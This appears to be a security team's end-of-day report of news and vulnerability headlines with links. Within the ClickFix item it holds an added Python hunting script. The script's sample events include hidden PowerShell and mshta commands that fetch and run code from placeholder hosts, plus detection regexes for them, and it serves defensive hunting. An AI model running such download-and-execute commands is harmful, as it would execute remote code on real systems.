End-of-Day report
Timeframe: Friday 08-05-2026 18:00 - Monday 11-05-2026 18:00
Handler: Felician Fuchs
Co-Handler: Alexander Riepl
News
Hackers abuse Google ads, Claude.ai chats to push Mac malware
Attackers are abusing Google Ads and legitimate Claude.ai shared chats in an active malvertising campaign. Users searching for "Claude mac download" may come across sponsored search results that list claude.ai as the target website, but lead to instructions that install malware on their Mac.
https://www.bleepingcomputer.com/news/security/hackers-abuse-google-ads-claudeai-chats-to-push-mac-malware/
Messenger: How Signal plans to make phishing attacks harder
After the messenger app Signal became the target of a phishing attack aimed at, among others, politicians, such attacks are to be made more difficult.
https://www.golem.de/news/messenger-so-will-signal-phishing-angriffe-erschweren-2605-208511.html
Fake OpenAI Privacy Filter Repo Hits #1 on Hugging Face, Draws 244K Downloads
A malicious Hugging Face repository managed to take a spot in the platform's trending list by impersonating OpenAI's Privacy Filter open-weight model to deliver a Rust-based information stealer to Windows users.
https://thehackernews.com/2026/05/fake-openai-privacy-filter-repo-hits-1.html
Checkmarx tackles another TeamPCP intrusion as Jenkins plugin sabotaged
Cybercrooks ruin engineers' weekends with Saturday attack. Checkmarx's software engineers are still working to remove a malicious version of the code security outfit's Jenkins plugin after detecting an unauthorized upload over the weekend.
https://www.theregister.com/devops/2026/05/11/checkmarx-tackles-another-teampcp-intrusion-as-jenkins-plugin-sabotaged/5237780
Yarbo responds to robot flaws that could mow down their owners
A researcher found a host of vulnerabilities in Yarbo garden robots that could expose Wi-Fi passwords, hijack cameras, and run over their owners on command.
https://www.malwarebytes.com/blog/news/2026/05/yarbo-responds-to-robot-flaws-that-could-mow-down-their-owners
E-mail about renewing the ID Austria app is fake
A fraudulent e-mail is currently circulating that urges users to carry out a supposedly necessary update of the ID Austria app. The goal: to gain access to private data and accounts.
https://www.watchlist-internet.at/news/erneuerung-der-id-austria-app-fake/
Flash Alert: EtherRat and TukTuk C2 End in The Gentleman Ransomware
In April, we observed an intrusion linked to the Atos-reported campaign where an EtherRAT was installed via a malicious MSI masquerading as a Sysinternals tool. Later in the intrusion, we observed the deployment of a new malware framework named TukTuk, first reported by Evangelos G, which, according to their analysis, is AI-generated.
https://thedfirreport.com/2026/05/11/flash-alert-etherrat-and-tuktuk-c2-end-in-the-gentleman-ransomware/
Vulnerability Garden: A growing list of named vulnerabilities, attack techniques and exploits
A growing list of 966 named vulnerabilities, attack techniques and exploits.
https://vulnerability.garden/
the 90 day disclosure policy is dead
The 90 day responsible disclosure window was built for a world where bug finders were rare and exploit development was slow. That world is gone. LLMs have compressed both timelines to near-zero. I have seen it first hand, and so has everyone else paying attention.
https://blog.himanshuanand.com/2026/05/the-90-day-disclosure-policy-is-dead/
Hunting ClickFix Win + X Variants
It has been just over a year since my post on ClickFix, where I explored the technique in depth. Since then, defenders have adopted countermeasures that detect ClickFix execution through the Windows Run prompt shortcut (Win + R), or have disabled that vector entirely through the Windows registry. This post focuses on variants that leverage the Windows Power User Menu (Win + X) and user-driven Terminal launches to paste and execute commands.
https://detect.fyi/hunting-clickfix-win-x-variants-ff06e4c62bd9
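As an added illustration of the hunting idea described above (this is not the detect.fyi post's own query or telemetry), the following Python snippet runs a few ClickFix-style command-line heuristics over constructed process-creation events and labels each hit with the launch vector it infers from the parent chain. The event field names, the parent-chain heuristics (explorer.exe as direct parent for a Run-dialog launch; explorer.exe -> WindowsTerminal.exe/OpenConsole.exe -> shell for a Win+X or user-driven Terminal launch) and the sample command lines are assumptions for illustration; tune them to your EDR's schema before use.

```python
"""Toy hunt for ClickFix-style pasted commands, including Win+X Terminal launches.

Added example, not code from the detect.fyi post. Events are plain dicts with
assumed field names (parent, grandparent, image, cmd); the parent-chain rules
are assumptions and should be adapted to real telemetry.
"""
import re
from typing import Dict, List, Optional

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # Classic Win+R path: explorer.exe spawns the shell directly.
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell -w hidden -c "iex (iwr http://example.invalid/a.txt)"'},
    # Win+X "Terminal" path: explorer.exe -> WindowsTerminal.exe -> shell,
    # the user pastes the lure's command into the prompt.
    {"parent": "WindowsTerminal.exe", "grandparent": "explorer.exe",
     "image": "powershell.exe", "cmd": "mshta https://example.invalid/verify"},
    # Benign admin activity through the same Terminal path.
    {"parent": "WindowsTerminal.exe", "grandparent": "explorer.exe",
     "image": "powershell.exe", "cmd": "Get-Service -Name wuauserv"},
    # Same suspicious command, but launched by a service, not a user: out of scope here.
    {"parent": "svchost.exe", "image": "powershell.exe",
     "cmd": 'powershell -w hidden -c "iex (iwr http://example.invalid/a.txt)"'},
]

# Generic ClickFix-style indicators (assumed, not an exhaustive or vendor list).
SUSPICIOUS = [
    re.compile(r"\biex\b|invoke-expression", re.I),
    re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl)\b.*https?://", re.I),
    re.compile(r"\bmshta\b", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
]


def launch_vector(ev: Dict[str, str]) -> Optional[str]:
    """Infer how the shell was started from the (assumed) parent chain."""
    parent = ev.get("parent", "").lower()
    grandparent = ev.get("grandparent", "").lower()
    if parent == "explorer.exe":
        # Run dialog (Win+R) or a Start-menu launch.
        return "win_r_or_shell"
    if parent in {"windowsterminal.exe", "openconsole.exe"} and grandparent == "explorer.exe":
        # Win+X "Terminal" or a user-opened Terminal window.
        return "win_x_terminal"
    return None


def suspicious_patterns(cmd: str) -> List[str]:
    """Return the patterns that fire on a command line."""
    return [p.pattern for p in SUSPICIOUS if p.search(cmd)]


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Flag user-launched shells whose command line matches ClickFix indicators."""
    hits: List[Dict[str, object]] = []
    for i, ev in enumerate(events):
        vector = launch_vector(ev)
        if vector is None:
            continue  # not a user-driven launch; handled by other rules
        matched = suspicious_patterns(ev.get("cmd", ""))
        if matched:
            hits.append({"index": i, "vector": vector,
                         "image": ev.get("image", ""), "matched": matched})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

The point of splitting `launch_vector` from the command-line patterns is that a rule keyed only on explorer.exe as parent misses the Win+X case entirely, while a rule keyed only on the command line fires on service-launched activity that belongs to a different playbook.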
Vulnerabilities
Root via DHCP reply: AI finds 21-year-old code execution flaw in FreeBSD
On countless FreeBSD-based systems, a malicious DHCP server on the network can be used to inject malicious code and execute it as root.
https://www.golem.de/news/per-dhcp-antwort-zum-root-ki-findet-21-jahre-alte-schadcode-luecke-in-freebsd-2605-208535.html
Ollama Out-of-Bounds Read Vulnerability Allows Remote Process Memory Leak
Cybersecurity researchers have disclosed a critical security vulnerability in Ollama that, if successfully exploited, could allow a remote, unauthenticated attacker to leak its entire process memory. The out-of-bounds read flaw, which likely impacts over 300,000 servers globally, is tracked as CVE-2026-7482 (CVSS score: 9.1). It has been codenamed Bleeding Llama by Cyera.
https://thehackernews.com/2026/05/ollama-out-of-bounds-read-vulnerability.html
JDownloader distributed malware downloads
The website of the fairly popular downloader tool JDownloader was compromised. As a result, it served fake installation packages laced with malware. The operators have since cleaned up the website. Daemon Tools had a similar incident; there too the owners have since reacted and now provide clean installers.
https://www.heise.de/news/JDownloader-verteilte-Malware-Downloads-11288832.html
Security patch: Security vulnerabilities in cPanel and WHM closed once again
Attackers can attack cPanel and WebHost Manager, among other things with malicious code. Security patches are available.
https://www.heise.de/news/Sicherheitspatch-Abermals-Sicherheitsluecken-in-cPanel-und-WHM-geschlossen-11288962.html
Malicious code vulnerability threatens IBM App Connect Enterprise and IBM Integration Bus
Attackers can attack IBM App Connect Enterprise and IBM Integration Bus for z/OS. Updates fix the security problem.
https://heise.de/-11289112
LWN Security updates for Monday
https://lwn.net/Articles/1072301/